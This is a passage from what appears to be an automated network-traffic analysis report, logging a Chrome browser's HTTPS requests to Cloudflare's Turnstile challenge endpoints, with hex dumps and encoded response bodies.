                                                                                  Data Ascii: 82imofEptXPyqqjrcqa2ajSnLbi3aHg4uSi5KPfqcKn6q2mvOiw4K/qtfXE6riu/vm8sr/7v7b+A8K64AnJ+A8DzsLtC+fuzBjoCu0a7/L13Pbq2CL2FRAb/NoGKAItLOoEMvwwBSYCL/MPNzT6Ezs6/S08OxRBIkQeSUgHIE4ZTCNCPA4lUTFQFjAlVBozW1kyUTVWNlZgID1aPmlCWUljL0dbaDBxYG9IdVZ3UX5sczxXg34/O1F7RTtzhF59
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 54 57 79 4a 57 69 7a 38 71 4e 7a 4a 54 64 73 74 47 31 6d 35 58 56 73 65 43 2b 77 37 6e 72 77 4e 75 6a 72 73 48 67 38 75 75 77 35 4e 48 7a 7a 66 6a 33 74 73 2f 39 79 50 76 51 38 63 33 36 76 39 71 37 41 73 53 36 39 67 6e 48 76 76 6f 4a 34 51 48 6b 42 75 72 66 34 52 48 73 43 67 51 56 31 2f 49 63 46 2b 38 65 47 42 37 33 2f 75 41 6f 2f 43 59 6a 36 75 63 70 4a 4f 6a 73 49 68 73 72 41 2f 54 7a 4e 67 73 54 47 69 77 50 4c 69 73 74 2b 54 34 4f 51 78 6c 47 51 41 41 44 48 67 55 45 49 45 30 2f 44 43 52 53 4f 30 41 6d 52 56 64 51 45 79 45 52 56 69 38 33 47 42 77 78 55 55 4a 58 4e 57 41 6b 5a 6a 31 61 50 6d 45 6e 51 69 6b 6f 52 48 46 6a 4d 45 68 32 58 32 52 4b 61 58 74 31 4e 30 56 65 54 55 6c 76 61 30 42 56 64 57 5a 37 57 59 52 49 69 6d 46 2b 59 6f 56 4c 5a 6b 31 4d 61
                                                                                  Data Ascii: TWyJWiz8qNzJTdstG1m5XVseC+w7nrwNujrsHg8uuw5NHzzfj3ts/9yPvQ8c36v9q7AsS69gnHvvoJ4QHkBurf4RHsCgQV1/IcF+8eGB73/uAo/CYj6ucpJOjsIhsrA/TzNgsTGiwPList+T4OQxlGQAADHgUEIE0/DCRSO0AmRVdQEyERVi83GBwxUUJXNWAkZj1aPmEnQikoRHFjMEh2X2RKaXt1N0VeTUlva0BVdWZ7WYRIimF+YoVLZk1Ma
                                                                                  2024-10-02 15:49:45 UTC1369INData Raw: 62 6a 70 50 52 73 62 36 65 76 61 4c 41 74 64 44 55 77 4b 50 6b 33 64 79 36 71 64 44 44 38 4e 72 72 34 39 50 67 7a 39 48 36 77 76 44 64 7a 39 54 61 76 4f 33 4d 2b 4f 44 53 2f 76 6b 46 43 66 54 42 44 50 76 61 44 74 76 4f 44 39 33 30 33 77 76 6d 42 2b 30 63 35 42 59 61 44 50 51 63 49 42 77 54 4a 42 37 32 46 76 67 6c 48 52 6f 61 35 51 67 77 4a 2f 72 75 36 67 44 7a 38 43 4d 47 43 53 6a 30 4d 78 4c 34 46 76 77 37 49 69 38 45 47 43 67 41 4e 78 38 6b 4a 79 77 72 4b 7a 30 68 43 30 56 4b 4a 56 51 4a 4a 6a 51 6d 52 54 42 4a 58 56 52 4e 4f 69 74 63 51 44 6b 7a 50 56 49 6f 52 6a 64 45 57 54 74 5a 50 30 35 79 52 6e 56 77 54 54 63 71 54 6b 6c 5a 4e 54 31 75 58 6b 31 70 4e 45 4a 55 64 55 35 39 57 30 4a 59 5a 55 78 45 67 6b 2b 52 53 47 42 4b 54 45 65 49 64 6f 47 5a 61 58
                                                                                  Data Ascii: bjpPRsb6evaLAtdDUwKPk3dy6qdDD8Nrr49Pgz9H6wvDdz9TavO3M+ODS/vkFCfTBDPvaDtvOD9303wvmB+0c5BYaDPQcIBwTJB72FvglHRoa5QgwJ/ru6gDz8CMGCSj0MxL4Fvw7Ii8EGCgANx8kJywrKz0hC0VKJVQJJjQmRTBJXVRNOitcQDkzPVIoRjdEWTtZP05yRnVwTTcqTklZNT1uXk1pNEJUdU59W0JYZUxEgk+RSGBKTEeIdoGZaX


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.449769104.18.94.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:47 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/429523053:1727882942:AUCUgSR7kOf38UcLE0OuEHEx3RPGx3lhdnkziYW9qco/8cc5d8159ce5185d/77bf10bc9e9db0f HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:47 UTC349INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 02 Oct 2024 15:49:47 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 7
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  cf-chl-out: EK8wCMkcTlmCWNUXnrCePBvbqbUoQnRQ5Co=$4D2Zm5iQQmyUWqPx
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d82a7f32de99-EWR
                                                                                  2024-10-02 15:49:47 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                  Data Ascii: invalid


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.449770104.18.95.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:47 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8cc5d8159ce5185d/1727884185696/IhqgAOPRuw5_jTL HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:47 UTC170INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:47 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d82d585917b5-EWR
                                                                                  2024-10-02 15:49:47 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 47 00 00 00 16 08 02 00 00 00 1d 00 16 1a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRGIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.449772104.18.94.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:48 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8cc5d8159ce5185d/1727884185696/IhqgAOPRuw5_jTL HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:48 UTC170INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:48 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d8336e048c15-EWR
                                                                                  2024-10-02 15:49:48 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 47 00 00 00 16 08 02 00 00 00 1d 00 16 1a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDRGIDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.449773104.18.95.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:49 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8cc5d8159ce5185d/1727884185699/6a8443e730cca91fcc019fa43e2caa5d910210e3641f376d94025e69ea631d9c/8lClcaSHEBS81wq HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: max-age=0
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:49 UTC143INHTTP/1.1 401 Unauthorized
                                                                                  Date: Wed, 02 Oct 2024 15:49:49 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 1
                                                                                  Connection: close
                                                                                  2024-10-02 15:49:49 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 61 6f 52 44 35 7a 44 4d 71 52 5f 4d 41 5a 2d 6b 50 69 79 71 58 5a 45 43 45 4f 4e 6b 48 7a 64 74 6c 41 4a 65 61 65 70 6a 48 5a 77 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gaoRD5zDMqR_MAZ-kPiyqXZECEONkHzdtlAJeaepjHZwAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                  2024-10-02 15:49:49 UTC1INData Raw: 4a
                                                                                  Data Ascii: J


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.449776104.18.95.414433244C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-02 15:49:51 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/429523053:1727882942:AUCUgSR7kOf38UcLE0OuEHEx3RPGx3lhdnkziYW9qco/8cc5d8159ce5185d/77bf10bc9e9db0f HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 31790
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: 77bf10bc9e9db0f
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-10-02 15:49:51 UTC16384OUTData Raw: 76 5f 38 63 63 35 64 38 31 35 39 63 65 35 31 38 35 64 3d 6b 52 2d 4b 48 69 68 73 74 42 74 30 64 62 25 32 62 6d 71 6d 45 42 2d 68 69 68 66 6d 69 4b 64 32 53 51 68 44 6d 68 35 32 62 73 6d 79 6d 69 49 32 53 70 68 24 6d 50 31 39 6d 68 74 66 35 68 59 6d 4d 49 43 51 6d 4d 4b 69 39 6c 6d 61 49 69 6f 6d 39 55 67 73 6d 42 65 6b 74 68 6f 75 30 2d 6d 6f 6d 6b 49 49 68 7a 39 39 30 69 42 6d 44 68 35 2d 64 6d 70 59 7a 43 66 34 62 6d 32 32 6d 67 58 4b 70 64 68 79 42 42 6d 6d 70 2b 6d 6b 74 4b 52 52 4b 62 64 70 6d 69 72 2b 70 4b 61 57 46 65 2d 6d 61 4b 4b 53 36 31 34 6e 53 75 53 6d 53 65 2d 53 30 6b 66 68 70 58 47 66 6d 4e 39 49 73 62 64 35 54 2d 24 31 75 4b 30 35 6d 43 67 4d 58 65 54 39 62 30 5a 47 73 6d 69 67 7a 67 50 6b 4d 61 4d 4c 4a 64 47 66 52 4b 34 34 30 44 55 76
                                                                                  Data Ascii: v_8cc5d8159ce5185d=kR-KHihstBt0db%2bmqmEB-hihfmiKd2SQhDmh52bsmymiI2Sph$mP19mhtf5hYmMICQmMKi9lmaIiom9UgsmBekthou0-momkIIhz990iBmDh5-dmpYzCf4bm22mgXKpdhyBBmmp+mktKRRKbdpmir+pKaWFe-maKKS614nSuSmSe-S0kfhpXGfmN9Isbd5T-$1uK05mCgMXeT9b0ZGsmigzgPkMaMLJdGfRK440DUv
                                                                                  2024-10-02 15:49:51 UTC15406OUTData Raw: 44 33 68 42 66 6d 32 6d 68 54 70 6d 30 52 52 31 6d 4b 52 47 69 6d 79 32 2d 71 6d 78 6d 6d 6d 42 58 62 32 69 69 34 4a 34 53 68 52 32 6d 6d 34 63 46 43 62 51 6d 55 4b 68 2d 2b 6d 43 41 6e 6f 4b 45 49 34 30 6e 75 6d 39 47 68 58 66 7a 6d 69 6d 42 4b 30 33 32 6b 49 68 6d 68 52 6d 39 6d 68 41 6d 67 78 50 6d 43 54 32 78 6d 38 4b 30 52 6d 36 6d 39 49 6d 32 68 35 4b 2b 45 68 64 6d 73 67 50 4b 53 53 68 33 6d 53 6d 68 72 68 34 6d 4e 6d 6d 53 6d 65 6d 6d 32 43 76 32 42 4b 69 6f 30 52 68 24 74 75 49 30 4c 66 61 43 71 32 69 2b 6d 4d 6d 30 6c 53 6c 6d 75 6d 42 6d 30 6d 68 5a 6d 38 4b 62 55 68 48 6d 70 49 6d 51 6d 74 6d 67 49 68 6d 6d 68 6d 62 4b 68 4b 68 71 32 2d 31 69 53 6d 6e 6d 38 71 69 59 6d 4f 52 45 6d 69 2d 6e 76 49 70 6d 53 49 30 75 6d 79 6d 53 32 68 2b 6d 75 6d
                                                                                  Data Ascii: D3hBfm2mhTpm0RR1mKRGimy2-qmxmmmBXb2ii4J4ShR2mm4cFCbQmUKh-+mCAnoKEI40num9GhXfzmimBK032kIhmhRm9mhAmgxPmCT2xm8K0Rm6m9Im2h5K+EhdmsgPKSSh3mSmhrh4mNmmSmemm2Cv2BKio0Rh$tuI0LfaCq2i+mMm0lSlmumBm0mhZm8KbUhHmpImQmtmgIhmmhmbKhKhq2-1iSmnm8qiYmOREmi-nvIpmSI0umymS2h+mum
                                                                                  2024-10-02 15:49:51 UTC300INHTTP/1.1 200 OK
                                                                                  Date: Wed, 02 Oct 2024 15:49:51 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 26812
                                                                                  Connection: close
                                                                                  cf-chl-gen: KM7XFlCQYGMYmdk9lC6dWrKOI+dFxjHS1y4Y8ahmvoLpmYCSopY3X1XMgHaXyF42M5H5cybtFdQIEI3o$es5EraQzXL8eflDq
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8cc5d8433ac58c33-EWR
                                                                                  2024-10-02 15:49:51 UTC1069INData Raw: 6e 5a 65 52 6a 4b 53 66 6f 35 65 55 6b 70 75 68 6d 71 79 58 68 70 32 6d 6e 63 2f 48 74 37 48 54 79 37 76 44 78 4e 61 2f 6c 35 4c 50 33 36 76 67 78 62 6d 68 77 61 6a 6e 74 75 47 72 78 4d 32 34 36 4e 2b 37 34 64 2f 72 72 2f 66 5a 74 50 62 39 36 73 7a 50 32 50 54 57 79 2b 33 64 30 72 2f 53 35 67 76 54 31 2b 6e 65 43 66 6e 51 36 51 30 45 33 65 6e 69 47 52 44 70 45 76 76 79 35 74 6f 52 34 65 37 73 48 50 6e 38 49 50 59 58 49 39 30 72 44 79 72 34 45 66 6b 49 37 42 4d 76 38 2b 6b 49 4e 53 34 62 4b 7a 33 36 43 51 6f 4b 48 42 67 50 46 6a 59 79 4d 68 5a 4b 41 78 67 57 51 7a 38 6e 49 55 49 55 4e 69 73 2f 53 51 74 4a 55 31 52 47 4d 46 56 51 4f 53 39 57 58 6b 31 6d 49 31 52 42 57 79 64 6b 57 47 42 42 59 45 31 6c 55 33 45 79 62 6b 46 41 52 6b 39 55 62 44 70 34 66 45 70
                                                                                  Data Ascii: nZeRjKSfo5eUkpuhmqyXhp2mnc/Ht7HTy7vDxNa/l5LP36vgxbmhwajntuGrxM246N+74d/rr/fZtPb96szP2PTWy+3d0r/S5gvT1+neCfnQ6Q0E3eniGRDpEvvy5toR4e7sHPn8IPYXI90rDyr4EfkI7BMv8+kINS4bKz36CQoKHBgPFjYyMhZKAxgWQz8nIUIUNis/SQtJU1RGMFVQOS9WXk1mI1RBWydkWGBBYE1lU3EybkFARk9UbDp4fEp
                                                                                  2024-10-02 15:49:51 UTC1369INData Raw: 38 48 62 31 4c 50 68 34 65 66 61 33 2b 69 73 70 2b 66 6d 73 4c 2b 76 39 37 58 56 38 62 50 56 2b 4e 58 63 30 67 43 34 2f 65 37 31 43 41 6e 37 79 63 54 30 2b 51 6e 64 41 4d 62 36 38 77 66 66 42 41 48 79 35 42 63 57 36 52 73 48 31 65 6b 69 47 51 54 7a 37 53 51 6c 39 66 51 44 2b 68 58 34 42 79 58 34 48 43 38 6a 38 42 51 32 4c 66 4d 51 46 44 55 35 45 44 73 70 4c 69 30 43 4d 6a 41 64 44 68 6f 6e 51 41 55 64 48 6a 73 75 4a 53 67 6f 45 43 38 55 4c 53 30 34 56 43 39 58 4c 52 5a 5a 52 6b 38 33 57 42 38 67 4f 46 31 65 47 57 4a 6c 55 6d 4e 69 5a 45 34 73 4d 47 74 62 5a 32 30 75 61 55 39 4f 65 54 51 34 57 57 39 64 4d 57 6c 31 64 56 70 4d 64 6f 64 66 68 58 6c 45 51 6c 53 4b 5a 56 6c 62 66 30 74 7a 62 49 78 49 69 49 39 6a 68 6c 4e 35 64 59 68 71 6d 35 74 77 6e 5a 52 32
                                                                                  Data Ascii: 8Hb1LPh4efa3+isp+fmsL+v97XV8bPV+NXc0gC4/e71CAn7ycT0+QndAMb68wffBAHy5BcW6RsH1ekiGQTz7SQl9fQD+hX4ByX4HC8j8BQ2LfMQFDU5EDspLi0CMjAdDhonQAUdHjsuJSgoEC8ULS04VC9XLRZZRk83WB8gOF1eGWJlUmNiZE4sMGtbZ20uaU9OeTQ4WW9dMWl1dVpMdodfhXlEQlSKZVlbf0tzbIxIiI9jhlN5dYhqm5twnZR2
                                                                                  2024-10-02 15:49:51 UTC1369INData Raw: 50 45 34 4d 2f 45 33 74 48 6c 38 65 61 2f 76 2b 66 61 30 38 36 35 7a 75 37 7a 2f 66 59 45 33 4d 41 45 7a 67 6a 37 43 74 51 41 78 66 6a 74 36 38 4c 6c 38 68 41 49 42 41 63 4c 79 75 50 72 2b 2f 6e 58 45 76 77 5a 43 39 6b 51 45 52 41 44 2b 41 45 49 49 76 54 69 2f 42 72 73 42 69 66 71 2b 78 34 52 41 69 34 6e 39 41 55 6b 4b 43 59 66 4e 52 77 75 51 6a 67 59 48 54 63 48 51 41 67 37 4f 30 51 32 4f 78 6c 4b 4a 43 31 4a 54 6a 38 2f 4e 30 34 70 47 54 42 4d 53 46 30 32 53 6a 42 65 4f 55 56 48 49 44 6b 33 4e 79 55 6b 49 30 34 6e 5a 44 35 44 4d 53 39 4d 53 32 31 6f 61 57 6c 38 52 58 4a 4a 4f 6c 6c 4f 53 6e 46 30 68 58 46 37 69 45 64 6e 57 58 65 4d 65 6e 68 64 68 31 78 6e 67 48 53 43 59 34 4a 53 56 70 6c 4f 61 58 64 33 63 48 47 63 6d 49 57 64 66 46 39 37 61 48 57 4d 6d
                                                                                  Data Ascii: PE4M/E3tHl8ea/v+fa0865zu7z/fYE3MAEzgj7CtQAxfjt68Ll8hAIBAcLyuPr+/nXEvwZC9kQERAD+AEIIvTi/BrsBifq+x4RAi4n9AUkKCYfNRwuQjgYHTcHQAg7O0Q2OxlKJC1JTj8/N04pGTBMSF02SjBeOUVHIDk3NyUkI04nZD5DMS9MS21oaWl8RXJJOllOSnF0hXF7iEdnWXeMenhdh1xngHSCY4JSVplOaXd3cHGcmIWdfF97aHWMm
                                                                                  2024-10-02 15:49:51 UTC1369INData Raw: 6d 72 66 62 56 74 75 4f 7a 32 66 54 5a 38 64 66 33 33 62 75 30 41 50 4c 53 42 41 41 48 34 4d 6b 49 32 67 6b 4b 43 4f 66 4c 78 42 41 4a 35 74 4c 7a 45 76 48 30 39 64 6a 58 44 67 76 64 49 65 76 79 34 4e 66 59 2b 64 2f 6a 43 76 6b 75 44 69 59 62 2b 69 4d 54 41 77 63 6b 41 79 4c 75 4f 69 67 36 4f 78 51 39 2f 43 49 75 2f 43 34 44 4a 6a 55 62 45 51 63 68 4e 51 6f 66 52 30 4a 50 44 55 63 64 55 30 45 74 56 42 45 32 4e 45 74 65 45 42 78 68 4c 6a 70 66 59 69 45 65 50 6d 68 5a 50 6b 74 48 53 55 6f 38 50 56 49 71 63 30 78 77 53 48 59 71 56 48 68 75 52 57 64 48 66 6e 78 62 53 30 39 37 54 6c 42 36 65 6b 4d 38 64 32 47 45 65 59 42 74 53 59 78 68 53 6d 6d 4a 69 6e 65 52 68 47 6c 53 63 57 75 53 66 35 69 62 66 58 65 42 65 6c 36 5a 71 4b 4e 6a 68 36 71 4e 69 61 32 75 6a 34
                                                                                  Data Ascii: mrfbVtuOz2fTZ8df33bu0APLSBAAH4MkI2gkKCOfLxBAJ5tLzEvH09djXDgvdIevy4NfY+d/jCvkuDiYb+iMTAwckAyLuOig6OxQ9/CIu/C4DJjUbEQchNQofR0JPDUcdU0EtVBE2NEteEBxhLjpfYiEePmhZPktHSUo8PVIqc0xwSHYqVHhuRWdHfnxbS097TlB6ekM8d2GEeYBtSYxhSmmJineRhGlScWuSf5ibfXeBel6ZqKNjh6qNia2uj4
                                                                                  2024-10-02 15:49:51 UTC1369INData Raw: 72 4f 6e 70 31 74 72 4c 7a 63 72 69 7a 63 54 78 34 73 4c 6f 41 38 6e 6b 33 75 58 6d 42 2f 48 6d 79 41 72 74 78 2b 33 66 37 78 49 56 2b 41 76 77 37 52 37 79 32 2f 4d 68 42 52 72 59 33 2b 51 6a 39 67 55 6d 2b 41 41 71 4b 78 30 6f 42 4f 30 4c 43 67 59 50 46 43 38 75 2b 41 6f 53 4c 6b 4c 39 44 42 59 54 48 79 4d 30 48 41 6b 65 4b 52 67 46 4f 45 30 6a 45 6a 38 4e 49 42 45 55 56 69 4e 43 47 31 73 73 58 6c 6b 37 59 54 6f 75 46 69 49 79 4a 54 41 6e 4b 69 63 38 61 47 46 63 4a 33 42 4c 4c 57 42 6a 51 46 68 76 64 45 78 4d 53 7a 78 64 66 32 68 61 56 6e 70 75 55 33 6d 47 50 6b 47 46 69 46 70 47 6a 59 53 51 69 6d 71 4c 6b 6b 2b 4f 59 46 68 73 63 31 70 54 61 59 35 56 6e 31 31 37 59 31 2b 69 6d 36 68 6d 70 6e 64 6d 5a 49 4f 47 70 5a 6c 74 72 36 69 51 70 70 43 78 6b 58 43
                                                                                  Data Ascii: rOnp1trLzcrizcTx4sLoA8nk3uXmB/HmyArtx+3f7xIV+Avw7R7y2/MhBRrY3+Qj9gUm+AAqKx0oBO0LCgYPFC8u+AoSLkL9DBYTHyM0HAkeKRgFOE0jEj8NIBEUViNCG1ssXlk7YTouFiIyJTAnKic8aGFcJ3BLLWBjQFhvdExMSzxdf2haVnpuU3mGPkGFiFpGjYSQimqLkk+OYFhsc1pTaY5Vn117Y1+im6hmpndmZIOGpZltr6iQppCxkXC
                                                                                  2024-10-02 15:49:51 UTC1369INData Raw: 41 45 42 7a 41 4f 39 41 66 72 37 36 4e 6e 56 43 74 62 63 35 39 6e 64 33 4f 6e 64 37 52 41 4d 46 77 54 59 36 75 67 64 44 65 77 65 31 77 2f 73 2b 42 45 46 42 75 50 31 4c 41 41 64 41 69 30 62 49 52 48 75 37 68 54 76 43 43 77 69 43 7a 73 59 4c 52 6f 38 4d 54 59 63 2f 42 55 39 51 53 41 34 2b 68 78 41 51 69 59 2b 47 55 73 37 45 43 41 4c 50 69 56 53 53 6b 45 35 55 6b 6b 2b 50 44 6c 4d 56 68 77 77 58 6c 45 66 51 46 39 56 58 53 74 66 54 6b 42 51 61 57 5a 6e 58 32 46 66 56 48 59 32 57 6b 68 75 4f 56 77 33 58 48 4a 34 64 33 4e 77 63 58 35 59 52 33 35 45 57 45 74 75 53 48 2b 45 66 6e 74 70 67 49 47 4f 6c 31 65 56 57 4a 64 59 6d 56 74 35 58 5a 32 5a 56 5a 4f 61 6d 36 65 69 70 6e 32 6e 61 71 6d 58 71 36 4b 75 68 47 57 68 72 35 57 6d 73 61 57 76 74 6e 65 65 6b 4b 43 41
                                                                                  Data Ascii: AEBzAO9Afr76NnVCtbc59nd3Ond7RAMFwTY6ugdDewe1w/s+BEFBuP1LAAdAi0bIRHu7hTvCCwiCzsYLRo8MTYc/BU9QSA4+hxAQiY+GUs7ECALPiVSSkE5Ukk+PDlMVhwwXlEfQF9VXStfTkBQaWZnX2FfVHY2WkhuOVw3XHJ4d3NwcX5YR35EWEtuSH+EfntpgIGOl1eVWJdYmVt5XZ2ZVZOam6eipn2naqmXq6KuhGWhr5WmsaWvtneekKCA
                                                                                  2024-10-02 15:49:51 UTC1369INData Raw: 63 43 78 77 76 46 42 73 72 4c 7a 77 7a 50 45 38 38 4c 44 77 50 56 46 42 4c 58 47 52 6f 48 42 78 30 61 33 78 63 55 49 66 67 66 35 53 55 54 4b 2b 63 70 36 2b 66 73 4b 69 6f 46 37 69 34 76 37 2f 41 32 49 7a 76 33 4f 52 45 76 2b 54 63 37 4e 77 4e 42 47 54 38 45 51 6b 4d 33 42 55 5a 48 4e 30 42 4e 4f 7a 38 4e 55 52 4d 4a 56 46 56 54 51 78 5a 54 56 31 38 5a 58 6b 74 54 48 32 45 6b 56 79 68 69 59 6a 30 6d 61 57 64 66 4c 32 70 71 4d 43 35 75 4d 7a 51 34 62 33 4e 6e 65 58 6c 52 65 7a 6c 2b 61 6b 42 41 66 6e 35 45 65 49 56 64 64 30 75 4a 59 58 64 51 69 6f 75 44 54 5a 4a 6f 61 56 4f 57 62 59 64 5a 6c 70 5a 63 6e 4a 78 67 69 32 43 62 6e 35 74 6a 70 61 4a 6f 5a 36 6d 42 6e 32 36 71 71 35 75 6b 73 5a 35 30 64 4c 56 34 72 37 6d 34 74 37 64 35 76 48 2b 56 67 63 43 2f 74
